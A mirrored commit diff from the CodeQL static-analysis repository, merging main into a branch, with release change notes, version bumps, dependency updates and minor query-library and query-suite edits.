mirror of
https://github.com/github/codeql.git
synced 2025-12-16 16:53:25 +01:00
Merge branch 'main' into redsun82/mad
This commit is contained in:
Paolo Tranquilli
2
.github/workflows/validate-change-notes.yml
vendored
2
.github/workflows/validate-change-notes.yml
vendored
@@ -31,4 +31,4 @@ jobs:
|
||||
- name: Fail if there are any errors with existing change notes
|
||||
|
||||
run: |
|
||||
codeql pack release --groups cpp,csharp,java,javascript,python,ruby,-examples,-test,-experimental
|
||||
codeql pack release --groups actions,cpp,csharp,go,java,javascript,python,ruby,shared,swift -examples,-test,-experimental
|
||||
|
||||
@@ -1,3 +1,11 @@
|
||||
## 0.4.11
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
## 0.4.10
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
## 0.4.9
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
3
actions/ql/lib/change-notes/released/0.4.10.md
Normal file
3
actions/ql/lib/change-notes/released/0.4.10.md
Normal file
@@ -0,0 +1,3 @@
|
||||
## 0.4.10
|
||||
|
||||
No user-facing changes.
|
||||
3
actions/ql/lib/change-notes/released/0.4.11.md
Normal file
3
actions/ql/lib/change-notes/released/0.4.11.md
Normal file
@@ -0,0 +1,3 @@
|
||||
## 0.4.11
|
||||
|
||||
No user-facing changes.
|
||||
@@ -1,2 +1,2 @@
|
||||
---
|
||||
lastReleaseVersion: 0.4.9
|
||||
lastReleaseVersion: 0.4.11
|
||||
|
||||
@@ -50,8 +50,8 @@ class Expression extends AstNode instanceof ExpressionImpl {
|
||||
string getNormalizedExpression() { result = normalizeExpr(expression) }
|
||||
}
|
||||
|
||||
/** A common class for `env` in workflow, job or step. */
|
||||
abstract class Env extends AstNode instanceof EnvImpl {
|
||||
/** An `env` in workflow, job or step. */
|
||||
class Env extends AstNode instanceof EnvImpl {
|
||||
/** Gets an environment variable value given its name. */
|
||||
ScalarValueImpl getEnvVarValue(string name) { result = super.getEnvVarValue(name) }
|
||||
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
name: codeql/actions-all
|
||||
version: 0.4.10-dev
|
||||
version: 0.4.12-dev
|
||||
library: true
|
||||
warnOnImplicitThis: true
|
||||
dependencies:
|
||||
|
||||
@@ -1,3 +1,13 @@
|
||||
## 0.6.3
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
## 0.6.2
|
||||
|
||||
### Minor Analysis Improvements
|
||||
|
||||
* The query `actions/missing-workflow-permissions` is now aware of the minimal permissions needed for the actions `deploy-pages`, `delete-package-versions`, `ai-inference`. This should lead to better alert messages and better fix suggestions.
|
||||
|
||||
## 0.6.1
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
@@ -1,4 +1,5 @@
|
||||
---
|
||||
category: minorAnalysis
|
||||
---
|
||||
## 0.6.2
|
||||
|
||||
### Minor Analysis Improvements
|
||||
|
||||
* The query `actions/missing-workflow-permissions` is now aware of the minimal permissions needed for the actions `deploy-pages`, `delete-package-versions`, `ai-inference`. This should lead to better alert messages and better fix suggestions.
|
||||
3
actions/ql/src/change-notes/released/0.6.3.md
Normal file
3
actions/ql/src/change-notes/released/0.6.3.md
Normal file
@@ -0,0 +1,3 @@
|
||||
## 0.6.3
|
||||
|
||||
No user-facing changes.
|
||||
@@ -1,2 +1,2 @@
|
||||
---
|
||||
lastReleaseVersion: 0.6.1
|
||||
lastReleaseVersion: 0.6.3
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
name: codeql/actions-queries
|
||||
version: 0.6.2-dev
|
||||
version: 0.6.4-dev
|
||||
library: false
|
||||
warnOnImplicitThis: true
|
||||
groups: [actions, queries]
|
||||
|
||||
@@ -1,3 +1,33 @@
|
||||
## 5.1.0
|
||||
|
||||
### New Features
|
||||
|
||||
* Added a predicate `getReferencedMember` to `UsingDeclarationEntry`, which yields a member depending on a type template parameter.
|
||||
|
||||
## 5.0.0
|
||||
|
||||
### Breaking Changes
|
||||
|
||||
* Deleted the deprecated `userInputArgument` predicate and its convenience accessor from the `Security.qll`.
|
||||
* Deleted the deprecated `userInputReturned` predicate and its convenience accessor from the `Security.qll`.
|
||||
* Deleted the deprecated `userInputReturn` predicate from the `Security.qll`.
|
||||
* Deleted the deprecated `isUserInput` predicate and its convenience accessor from the `Security.qll`.
|
||||
* Deleted the deprecated `userInputArgument` predicate from the `SecurityOptions.qll`.
|
||||
* Deleted the deprecated `userInputReturned` predicate from the `SecurityOptions.qll`.
|
||||
|
||||
### New Features
|
||||
|
||||
* Added local flow source models for `ReadFile`, `ReadFileEx`, `MapViewOfFile`, `MapViewOfFile2`, `MapViewOfFile3`, `MapViewOfFile3FromApp`, `MapViewOfFileEx`, `MapViewOfFileFromApp`, `MapViewOfFileNuma2`, and `NtReadFile`.
|
||||
* Added the `pCmdLine` arguments of `WinMain` and `wWinMain` as local flow sources.
|
||||
* Added source models for `GetCommandLineA`, `GetCommandLineW`, `GetEnvironmentStringsA`, `GetEnvironmentStringsW`, `GetEnvironmentVariableA`, and `GetEnvironmentVariableW`.
|
||||
* Added summary models for `CommandLineToArgvA` and `CommandLineToArgvW`.
|
||||
* Added support for `wmain` as part of the ArgvSource model.
|
||||
|
||||
### Bug Fixes
|
||||
|
||||
* Fixed a problem where `asExpr()` on `DataFlow::Node` would never return `ArrayAggregateLiteral`s.
|
||||
* Fixed a problem where `asExpr()` on `DataFlow::Node` would never return `ClassAggregateLiteral`s.
|
||||
|
||||
## 4.3.1
|
||||
|
||||
### Bug Fixes
|
||||
|
||||
@@ -1,4 +0,0 @@
|
||||
---
|
||||
category: fix
|
||||
---
|
||||
* Fixed a problem where `asExpr()` on `DataFlow::Node` would never return `ClassAggregateLiteral`s.
|
||||
@@ -1,4 +0,0 @@
|
||||
---
|
||||
category: fix
|
||||
---
|
||||
* Fixed a problem where `asExpr()` on `DataFlow::Node` would never return `ArrayAggregateLiteral`s.
|
||||
@@ -1,4 +0,0 @@
|
||||
---
|
||||
category: feature
|
||||
---
|
||||
* Added support for `wmain` as part of the ArgvSource model.
|
||||
@@ -1,9 +0,0 @@
|
||||
---
|
||||
category: breaking
|
||||
---
|
||||
* Deleted the deprecated `userInputArgument` predicate and its convenience accessor from the `Security.qll`.
|
||||
* Deleted the deprecated `userInputReturned` predicate and its convenience accessor from the `Security.qll`.
|
||||
* Deleted the deprecated `userInputReturn` predicate from the `Security.qll`.
|
||||
* Deleted the deprecated `isUserInput` predicate and its convenience accessor from the `Security.qll`.
|
||||
* Deleted the deprecated `userInputArgument` predicate from the `SecurityOptions.qll`.
|
||||
* Deleted the deprecated `userInputReturned` predicate from the `SecurityOptions.qll`.
|
||||
@@ -1,6 +0,0 @@
|
||||
---
|
||||
category: feature
|
||||
---
|
||||
* Added the `pCmdLine` arguments of `WinMain` and `wWinMain` as local flow sources.
|
||||
* Added source models for `GetCommandLineA`, `GetCommandLineW`, `GetEnvironmentStringsA`, `GetEnvironmentStringsW`, `GetEnvironmentVariableA`, and `GetEnvironmentVariableW`.
|
||||
* Added summary models for `CommandLineToArgvA` and `CommandLineToArgvW`.
|
||||
@@ -1,4 +0,0 @@
|
||||
---
|
||||
category: feature
|
||||
---
|
||||
* Added local flow source models for `ReadFile`, `ReadFileEx`, `MapViewOfFile`, `MapViewOfFile2`, `MapViewOfFile3`, `MapViewOfFile3FromApp`, `MapViewOfFileEx`, `MapViewOfFileFromApp`, `MapViewOfFileNuma2`, and `NtReadFile`.
|
||||
23
cpp/ql/lib/change-notes/released/5.0.0.md
Normal file
23
cpp/ql/lib/change-notes/released/5.0.0.md
Normal file
@@ -0,0 +1,23 @@
|
||||
## 5.0.0
|
||||
|
||||
### Breaking Changes
|
||||
|
||||
* Deleted the deprecated `userInputArgument` predicate and its convenience accessor from the `Security.qll`.
|
||||
* Deleted the deprecated `userInputReturned` predicate and its convenience accessor from the `Security.qll`.
|
||||
* Deleted the deprecated `userInputReturn` predicate from the `Security.qll`.
|
||||
* Deleted the deprecated `isUserInput` predicate and its convenience accessor from the `Security.qll`.
|
||||
* Deleted the deprecated `userInputArgument` predicate from the `SecurityOptions.qll`.
|
||||
* Deleted the deprecated `userInputReturned` predicate from the `SecurityOptions.qll`.
|
||||
|
||||
### New Features
|
||||
|
||||
* Added local flow source models for `ReadFile`, `ReadFileEx`, `MapViewOfFile`, `MapViewOfFile2`, `MapViewOfFile3`, `MapViewOfFile3FromApp`, `MapViewOfFileEx`, `MapViewOfFileFromApp`, `MapViewOfFileNuma2`, and `NtReadFile`.
|
||||
* Added the `pCmdLine` arguments of `WinMain` and `wWinMain` as local flow sources.
|
||||
* Added source models for `GetCommandLineA`, `GetCommandLineW`, `GetEnvironmentStringsA`, `GetEnvironmentStringsW`, `GetEnvironmentVariableA`, and `GetEnvironmentVariableW`.
|
||||
* Added summary models for `CommandLineToArgvA` and `CommandLineToArgvW`.
|
||||
* Added support for `wmain` as part of the ArgvSource model.
|
||||
|
||||
### Bug Fixes
|
||||
|
||||
* Fixed a problem where `asExpr()` on `DataFlow::Node` would never return `ArrayAggregateLiteral`s.
|
||||
* Fixed a problem where `asExpr()` on `DataFlow::Node` would never return `ClassAggregateLiteral`s.
|
||||
@@ -1,4 +1,5 @@
|
||||
---
|
||||
category: feature
|
||||
---
|
||||
## 5.1.0
|
||||
|
||||
### New Features
|
||||
|
||||
* Added a predicate `getReferencedMember` to `UsingDeclarationEntry`, which yields a member depending on a type template parameter.
|
||||
@@ -1,2 +1,2 @@
|
||||
---
|
||||
lastReleaseVersion: 4.3.1
|
||||
lastReleaseVersion: 5.1.0
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
name: codeql/cpp-all
|
||||
version: 4.3.2-dev
|
||||
version: 5.1.1-dev
|
||||
groups: cpp
|
||||
dbscheme: semmlecode.cpp.dbscheme
|
||||
extractor: cpp
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
@@ -1,3 +1,13 @@
|
||||
## 1.4.2
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
## 1.4.1
|
||||
|
||||
### Minor Analysis Improvements
|
||||
|
||||
* Added flow model for the `SQLite` and `OpenSSL` libraries. This may result in more alerts when running queries on codebases that use these libraries.
|
||||
|
||||
## 1.4.0
|
||||
|
||||
### Query Metadata Changes
|
||||
|
||||
@@ -1,4 +1,5 @@
|
||||
---
|
||||
category: minorAnalysis
|
||||
---
|
||||
* Added flow model for the `SQLite` and `OpenSSL` libraries. This may result in more alerts when running queries on codebases that use these libraries.
|
||||
## 1.4.1
|
||||
|
||||
### Minor Analysis Improvements
|
||||
|
||||
* Added flow model for the `SQLite` and `OpenSSL` libraries. This may result in more alerts when running queries on codebases that use these libraries.
|
||||
3
cpp/ql/src/change-notes/released/1.4.2.md
Normal file
3
cpp/ql/src/change-notes/released/1.4.2.md
Normal file
@@ -0,0 +1,3 @@
|
||||
## 1.4.2
|
||||
|
||||
No user-facing changes.
|
||||
@@ -1,2 +1,2 @@
|
||||
---
|
||||
lastReleaseVersion: 1.4.0
|
||||
lastReleaseVersion: 1.4.2
|
||||
|
||||
@@ -98,8 +98,8 @@ private predicate exprReleases(Expr e, Expr released, string kind) {
|
||||
e.(FunctionCall).getTarget() = f or
|
||||
e.(FunctionCall).getTarget().(MemberFunction).getAnOverridingFunction+() = f
|
||||
) and
|
||||
access = f.getParameter(arg).getAnAccess() and
|
||||
e.(FunctionCall).getArgument(arg) = released and
|
||||
access = f.getParameter(pragma[only_bind_into](arg)).getAnAccess() and
|
||||
e.(FunctionCall).getArgument(pragma[only_bind_into](arg)) = released and
|
||||
exprReleases(_,
|
||||
pragma[only_bind_into](exprOrDereference(globalValueNumber(access).getAnExpr())), kind)
|
||||
)
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
name: codeql/cpp-queries
|
||||
version: 1.4.1-dev
|
||||
version: 1.4.3-dev
|
||||
groups:
|
||||
- cpp
|
||||
- queries
|
||||
|
||||
@@ -1,4 +1,10 @@
|
||||
uniqueEnclosingCallable
|
||||
| builtin.c:14:3:14:16 | ... * ... | Node should have one enclosing callable but has 0. |
|
||||
| builtin.c:14:3:14:16 | sizeof(int) | Node should have one enclosing callable but has 0. |
|
||||
| builtin.c:14:10:14:10 | 4 | Node should have one enclosing callable but has 0. |
|
||||
| builtin.c:15:3:15:16 | ... * ... | Node should have one enclosing callable but has 0. |
|
||||
| builtin.c:15:3:15:16 | sizeof(int) | Node should have one enclosing callable but has 0. |
|
||||
| builtin.c:15:10:15:10 | 4 | Node should have one enclosing callable but has 0. |
|
||||
| enum.c:2:6:2:6 | 1 | Node should have one enclosing callable but has 0. |
|
||||
| enum.c:2:6:2:10 | ... + ... | Node should have one enclosing callable but has 0. |
|
||||
| enum.c:2:10:2:10 | 1 | Node should have one enclosing callable but has 0. |
|
||||
|
||||
@@ -1,3 +1,11 @@
|
||||
## 1.7.42
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
## 1.7.41
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
## 1.7.40
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
@@ -0,0 +1,3 @@
|
||||
## 1.7.41
|
||||
|
||||
No user-facing changes.
|
||||
@@ -0,0 +1,3 @@
|
||||
## 1.7.42
|
||||
|
||||
No user-facing changes.
|
||||
@@ -1,2 +1,2 @@
|
||||
---
|
||||
lastReleaseVersion: 1.7.40
|
||||
lastReleaseVersion: 1.7.42
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
name: codeql/csharp-solorigate-all
|
||||
version: 1.7.41-dev
|
||||
version: 1.7.43-dev
|
||||
groups:
|
||||
- csharp
|
||||
- solorigate
|
||||
|
||||
@@ -1,3 +1,11 @@
|
||||
## 1.7.42
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
## 1.7.41
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
## 1.7.40
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
@@ -0,0 +1,3 @@
|
||||
## 1.7.41
|
||||
|
||||
No user-facing changes.
|
||||
@@ -0,0 +1,3 @@
|
||||
## 1.7.42
|
||||
|
||||
No user-facing changes.
|
||||
@@ -1,2 +1,2 @@
|
||||
---
|
||||
lastReleaseVersion: 1.7.40
|
||||
lastReleaseVersion: 1.7.42
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
name: codeql/csharp-solorigate-queries
|
||||
version: 1.7.41-dev
|
||||
version: 1.7.43-dev
|
||||
groups:
|
||||
- csharp
|
||||
- solorigate
|
||||
|
||||
@@ -1,3 +1,13 @@
|
||||
## 5.1.8
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
## 5.1.7
|
||||
|
||||
### Minor Analysis Improvements
|
||||
|
||||
* The generated Models as Data (MaD) models for .NET 9 Runtime have been updated and are now more precise (due to a recent model generator improvement).
|
||||
|
||||
## 5.1.6
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
@@ -1,4 +1,5 @@
|
||||
---
|
||||
category: minorAnalysis
|
||||
---
|
||||
## 5.1.7
|
||||
|
||||
### Minor Analysis Improvements
|
||||
|
||||
* The generated Models as Data (MaD) models for .NET 9 Runtime have been updated and are now more precise (due to a recent model generator improvement).
|
||||
3
csharp/ql/lib/change-notes/released/5.1.8.md
Normal file
3
csharp/ql/lib/change-notes/released/5.1.8.md
Normal file
@@ -0,0 +1,3 @@
|
||||
## 5.1.8
|
||||
|
||||
No user-facing changes.
|
||||
@@ -1,2 +1,2 @@
|
||||
---
|
||||
lastReleaseVersion: 5.1.6
|
||||
lastReleaseVersion: 5.1.8
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
name: codeql/csharp-all
|
||||
version: 5.1.7-dev
|
||||
version: 5.1.9-dev
|
||||
groups: csharp
|
||||
dbscheme: semmlecode.csharp.dbscheme
|
||||
extractor: csharp
|
||||
|
||||
@@ -1,3 +1,16 @@
|
||||
## 1.2.2
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
## 1.2.1
|
||||
|
||||
### Minor Analysis Improvements
|
||||
|
||||
* The precision of the query `cs/missed-readonly-modifier` has been improved. Some false positives related to static fields and struct type fields have been removed.
|
||||
* The queries `cs/password-in-configuration`, `cs/hardcoded-credentials` and `cs/hardcoded-connection-string-credentials` have been removed from all query suites.
|
||||
* The precision of the query `cs/gethashcode-is-not-defined` has been improved (false negative reduction). Calls to more methods (and indexers) that rely on the invariant `e1.Equals(e2)` implies `e1.GetHashCode() == e2.GetHashCode()` are taken into account.
|
||||
* The precision of the query `cs/uncontrolled-format-string` has been improved (false negative reduction). Calls to `System.Text.CompositeFormat.Parse` are now considered a format like method call.
|
||||
|
||||
## 1.2.0
|
||||
|
||||
### Query Metadata Changes
|
||||
|
||||
@@ -1,4 +0,0 @@
|
||||
---
|
||||
category: minorAnalysis
|
||||
---
|
||||
* The precision of the query `cs/uncontrolled-format-string` has been improved (false negative reduction). Calls to `System.Text.CompositeFormat.Parse` are now considered a format like method call.
|
||||
@@ -1,4 +0,0 @@
|
||||
---
|
||||
category: minorAnalysis
|
||||
---
|
||||
* The precision of the query `cs/gethashcode-is-not-defined` has been improved (false negative reduction). Calls to more methods (and indexers) that rely on the invariant `e1.Equals(e2)` implies `e1.GetHashCode() == e2.GetHashCode()` are taken into account.
|
||||
@@ -1,4 +0,0 @@
|
||||
---
|
||||
category: minorAnalysis
|
||||
---
|
||||
* The queries `cs/password-in-configuration`, `cs/hardcoded-credentials` and `cs/hardcoded-connection-string-credentials` have been removed from all query suites.
|
||||
@@ -1,4 +0,0 @@
|
||||
---
|
||||
category: minorAnalysis
|
||||
---
|
||||
* The precision of the query `cs/missed-readonly-modifier` has been improved. Some false positives related to static fields and struct type fields have been removed.
|
||||
8
csharp/ql/src/change-notes/released/1.2.1.md
Normal file
8
csharp/ql/src/change-notes/released/1.2.1.md
Normal file
@@ -0,0 +1,8 @@
|
||||
## 1.2.1
|
||||
|
||||
### Minor Analysis Improvements
|
||||
|
||||
* The precision of the query `cs/missed-readonly-modifier` has been improved. Some false positives related to static fields and struct type fields have been removed.
|
||||
* The queries `cs/password-in-configuration`, `cs/hardcoded-credentials` and `cs/hardcoded-connection-string-credentials` have been removed from all query suites.
|
||||
* The precision of the query `cs/gethashcode-is-not-defined` has been improved (false negative reduction). Calls to more methods (and indexers) that rely on the invariant `e1.Equals(e2)` implies `e1.GetHashCode() == e2.GetHashCode()` are taken into account.
|
||||
* The precision of the query `cs/uncontrolled-format-string` has been improved (false negative reduction). Calls to `System.Text.CompositeFormat.Parse` are now considered a format like method call.
|
||||
3
csharp/ql/src/change-notes/released/1.2.2.md
Normal file
3
csharp/ql/src/change-notes/released/1.2.2.md
Normal file
@@ -0,0 +1,3 @@
|
||||
## 1.2.2
|
||||
|
||||
No user-facing changes.
|
||||
@@ -1,2 +1,2 @@
|
||||
---
|
||||
lastReleaseVersion: 1.2.0
|
||||
lastReleaseVersion: 1.2.2
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
name: codeql/csharp-queries
|
||||
version: 1.2.1-dev
|
||||
version: 1.2.3-dev
|
||||
groups:
|
||||
- csharp
|
||||
- queries
|
||||
|
||||
@@ -5,6 +5,7 @@ archive/zip,,,6,,,,,,,,,,,,,,,,,,,,,,,6,
|
||||
bufio,,,17,,,,,,,,,,,,,,,,,,,,,,,17,
|
||||
bytes,,,43,,,,,,,,,,,,,,,,,,,,,,,43,
|
||||
clevergo.tech/clevergo,1,,,,,,,,,,,,,,,,,1,,,,,,,,,
|
||||
cloud.google.com/go/bigquery,1,,,,,,,,,,,,,,1,,,,,,,,,,,,
|
||||
compress/bzip2,,,1,,,,,,,,,,,,,,,,,,,,,,,1,
|
||||
compress/flate,,,4,,,,,,,,,,,,,,,,,,,,,,,4,
|
||||
compress/gzip,,,3,,,,,,,,,,,,,,,,,,,,,,,3,
|
||||
|
||||
|
@@ -37,6 +37,7 @@ Go framework & library support
|
||||
`XPath <https://github.com/antchfx/xpath>`_,``github.com/antchfx/xpath*``,,,4
|
||||
`appleboy/gin-jwt <https://github.com/appleboy/gin-jwt>`_,``github.com/appleboy/gin-jwt*``,,,1
|
||||
`beego <https://beego.me/>`_,"``github.com/astaxie/beego*``, ``github.com/beego/beego*``",102,63,213
|
||||
`bigquery <https://pkg.go.dev/cloud.google.com/go/bigquery>`_,``cloud.google.com/go/bigquery*``,,,1
|
||||
`chi <https://go-chi.io/>`_,``github.com/go-chi/chi*``,3,,
|
||||
`cristalhq/jwt <https://github.com/cristalhq/jwt>`_,``github.com/cristalhq/jwt*``,,,1
|
||||
`env <https://github.com/caarlos0/env>`_,``github.com/caarlos0/env*``,5,2,
|
||||
@@ -53,7 +54,7 @@ Go framework & library support
|
||||
`goproxy <https://github.com/elazarl/goproxy>`_,``github.com/elazarl/goproxy*``,2,2,2
|
||||
`gorilla/mux <https://github.com/gorilla/mux>`_,``github.com/gorilla/mux*``,1,,
|
||||
`gorilla/websocket <https://github.com/gorilla/websocket>`_,``github.com/gorilla/websocket*``,3,,
|
||||
`gorqlite <https://github.com/rqlite/gorqlite>`_,"``github.com/raindog308/gorqlite*``, ``github.com/rqlite/gorqlite*``",16,4,48
|
||||
`gorqlite <https://github.com/rqlite/gorqlite>`_,"``github.com/raindog308/gorqlite*``, ``github.com/rqlite/gorqlite*``, ``github.com/kanikanema/gorqlite*``",24,6,72
|
||||
`goxpath <https://github.com/ChrisTrenkamp/goxpath/wiki>`_,``github.com/ChrisTrenkamp/goxpath*``,,,3
|
||||
`htmlquery <https://github.com/antchfx/htmlquery>`_,``github.com/antchfx/htmlquery*``,,,4
|
||||
`json-iterator <https://github.com/json-iterator/go>`_,``github.com/json-iterator/go*``,,4,
|
||||
@@ -73,6 +74,5 @@ Go framework & library support
|
||||
`xpathparser <https://github.com/santhosh-tekuri/xpathparser>`_,``github.com/santhosh-tekuri/xpathparser*``,,,2
|
||||
`yaml <https://gopkg.in/yaml.v3>`_,``gopkg.in/yaml*``,,9,
|
||||
`zap <https://go.uber.org/zap>`_,``go.uber.org/zap*``,,11,33
|
||||
Others,``github.com/kanikanema/gorqlite``,8,2,24
|
||||
Totals,,688,1069,1556
|
||||
Totals,,688,1069,1557
|
||||
|
||||
|
||||
@@ -9,8 +9,8 @@ toolchain go1.24.0
|
||||
// when adding or removing dependencies, run
|
||||
// bazel mod tidy
|
||||
require (
|
||||
golang.org/x/mod v0.24.0
|
||||
golang.org/x/tools v0.33.0
|
||||
golang.org/x/mod v0.25.0
|
||||
golang.org/x/tools v0.34.0
|
||||
)
|
||||
|
||||
require golang.org/x/sync v0.14.0 // indirect
|
||||
require golang.org/x/sync v0.15.0 // indirect
|
||||
|
||||
@@ -1,8 +1,8 @@
|
||||
github.com/google/go-cmp v0.6.0 h1:ofyhxvXcZhMsU5ulbFiLKl/XBFqE1GSq7atu8tAmTRI=
|
||||
github.com/google/go-cmp v0.6.0/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY=
|
||||
golang.org/x/mod v0.24.0 h1:ZfthKaKaT4NrhGVZHO1/WDTwGES4De8KtWO0SIbNJMU=
|
||||
golang.org/x/mod v0.24.0/go.mod h1:IXM97Txy2VM4PJ3gI61r1YEk/gAj6zAHN3AdZt6S9Ww=
|
||||
golang.org/x/sync v0.14.0 h1:woo0S4Yywslg6hp4eUFjTVOyKt0RookbpAHG4c1HmhQ=
|
||||
golang.org/x/sync v0.14.0/go.mod h1:1dzgHSNfp02xaA81J2MS99Qcpr2w7fw1gpm99rleRqA=
|
||||
golang.org/x/tools v0.33.0 h1:4qz2S3zmRxbGIhDIAgjxvFutSvH5EfnsYrRBj0UI0bc=
|
||||
golang.org/x/tools v0.33.0/go.mod h1:CIJMaWEY88juyUfo7UbgPqbC8rU2OqfAV1h2Qp0oMYI=
|
||||
golang.org/x/mod v0.25.0 h1:n7a+ZbQKQA/Ysbyb0/6IbB1H/X41mKgbhfv7AfG/44w=
|
||||
golang.org/x/mod v0.25.0/go.mod h1:IXM97Txy2VM4PJ3gI61r1YEk/gAj6zAHN3AdZt6S9Ww=
|
||||
golang.org/x/sync v0.15.0 h1:KWH3jNZsfyT6xfAfKiz6MRNmd46ByHDYaZ7KSkCtdW8=
|
||||
golang.org/x/sync v0.15.0/go.mod h1:1dzgHSNfp02xaA81J2MS99Qcpr2w7fw1gpm99rleRqA=
|
||||
golang.org/x/tools v0.34.0 h1:qIpSLOxeCYGg9TrcJokLBG4KFA6d795g0xkBkiESGlo=
|
||||
golang.org/x/tools v0.34.0/go.mod h1:pAP9OwEaY1CAW3HOmg3hLZC5Z0CCmzjAF2UQMSqNARg=
|
||||
|
||||
@@ -1,3 +1,11 @@
|
||||
## 1.0.25
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
## 1.0.24
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
## 1.0.23
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
@@ -0,0 +1,3 @@
|
||||
## 1.0.24
|
||||
|
||||
No user-facing changes.
|
||||
@@ -0,0 +1,3 @@
|
||||
## 1.0.25
|
||||
|
||||
No user-facing changes.
|
||||
@@ -1,2 +1,2 @@
|
||||
---
|
||||
lastReleaseVersion: 1.0.23
|
||||
lastReleaseVersion: 1.0.25
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
name: codeql-go-consistency-queries
|
||||
version: 1.0.24-dev
|
||||
version: 1.0.26-dev
|
||||
groups:
|
||||
- go
|
||||
- queries
|
||||
|
||||
@@ -8,6 +8,7 @@ ql/go/ql/src/Security/CWE-022/TaintedPath.ql
|
||||
ql/go/ql/src/Security/CWE-022/UnsafeUnzipSymlink.ql
|
||||
ql/go/ql/src/Security/CWE-022/ZipSlip.ql
|
||||
ql/go/ql/src/Security/CWE-078/CommandInjection.ql
|
||||
ql/go/ql/src/Security/CWE-079/HtmlTemplateEscapingBypassXss.ql
|
||||
ql/go/ql/src/Security/CWE-079/ReflectedXss.ql
|
||||
ql/go/ql/src/Security/CWE-089/SqlInjection.ql
|
||||
ql/go/ql/src/Security/CWE-089/StringBreak.ql
|
||||
|
||||
@@ -30,6 +30,7 @@ ql/go/ql/src/Security/CWE-022/TaintedPath.ql
|
||||
ql/go/ql/src/Security/CWE-022/UnsafeUnzipSymlink.ql
|
||||
ql/go/ql/src/Security/CWE-022/ZipSlip.ql
|
||||
ql/go/ql/src/Security/CWE-078/CommandInjection.ql
|
||||
ql/go/ql/src/Security/CWE-079/HtmlTemplateEscapingBypassXss.ql
|
||||
ql/go/ql/src/Security/CWE-079/ReflectedXss.ql
|
||||
ql/go/ql/src/Security/CWE-089/SqlInjection.ql
|
||||
ql/go/ql/src/Security/CWE-089/StringBreak.ql
|
||||
|
||||
@@ -8,6 +8,7 @@ ql/go/ql/src/Security/CWE-022/TaintedPath.ql
|
||||
ql/go/ql/src/Security/CWE-022/UnsafeUnzipSymlink.ql
|
||||
ql/go/ql/src/Security/CWE-022/ZipSlip.ql
|
||||
ql/go/ql/src/Security/CWE-078/CommandInjection.ql
|
||||
ql/go/ql/src/Security/CWE-079/HtmlTemplateEscapingBypassXss.ql
|
||||
ql/go/ql/src/Security/CWE-079/ReflectedXss.ql
|
||||
ql/go/ql/src/Security/CWE-089/SqlInjection.ql
|
||||
ql/go/ql/src/Security/CWE-089/StringBreak.ql
|
||||
|
||||
@@ -21,7 +21,6 @@ ql/go/ql/src/experimental/CWE-522-DecompressionBombs/DecompressionBombs.ql
|
||||
ql/go/ql/src/experimental/CWE-525/WebCacheDeception.ql
|
||||
ql/go/ql/src/experimental/CWE-74/DsnInjection.ql
|
||||
ql/go/ql/src/experimental/CWE-74/DsnInjectionLocal.ql
|
||||
ql/go/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
|
||||
ql/go/ql/src/experimental/CWE-807/SensitiveConditionBypass.ql
|
||||
ql/go/ql/src/experimental/CWE-840/ConditionalBypass.ql
|
||||
ql/go/ql/src/experimental/CWE-918/SSRF.ql
|
||||
|
||||
@@ -1,3 +1,13 @@
|
||||
## 4.2.7
|
||||
|
||||
### Minor Analysis Improvements
|
||||
|
||||
* The first argument of `Client.Query` in `cloud.google.com/go/bigquery` is now recognized as a SQL injection sink.
|
||||
|
||||
## 4.2.6
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
## 4.2.5
|
||||
|
||||
No user-facing changes.
|
||||
|
||||
3
go/ql/lib/change-notes/released/4.2.6.md
Normal file
3
go/ql/lib/change-notes/released/4.2.6.md
Normal file
@@ -0,0 +1,3 @@
|
||||
## 4.2.6
|
||||
|
||||
No user-facing changes.
|
||||
@@ -1,4 +1,5 @@
|
||||
---
|
||||
category: minorAnalysis
|
||||
---
|
||||
## 4.2.7
|
||||
|
||||
### Minor Analysis Improvements
|
||||
|
||||
* The first argument of `Client.Query` in `cloud.google.com/go/bigquery` is now recognized as a SQL injection sink.
|
||||
@@ -1,2 +1,2 @@
|
||||
---
|
||||
lastReleaseVersion: 4.2.5
|
||||
lastReleaseVersion: 4.2.7
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
name: codeql/go-all
|
||||
version: 4.2.6-dev
|
||||
version: 4.2.8-dev
|
||||
groups: go
|
||||
dbscheme: go.dbscheme
|
||||
extractor: go
|
||||
|
||||
@@ -1,3 +1,15 @@
|
||||
## 1.3.0
|
||||
|
||||
### New Queries
|
||||
|
||||
* Query (`go/html-template-escaping-bypass-xss`) has been promoted to the main query suite. This query finds potential cross-site scripting (XSS) vulnerabilities when using the `html/template` package, caused by user input being cast to a type which bypasses the HTML autoescaping. It was originally contributed to the experimental query pack by @gagliardetto in <https://github.com/github/codeql-go/pull/493>.
|
||||
|
||||
## 1.2.1
|
||||
|
||||
### Minor Analysis Improvements
|
||||
|
||||
* The query `go/hardcoded-credentials` has been removed from all query suites.
|
||||
|
||||
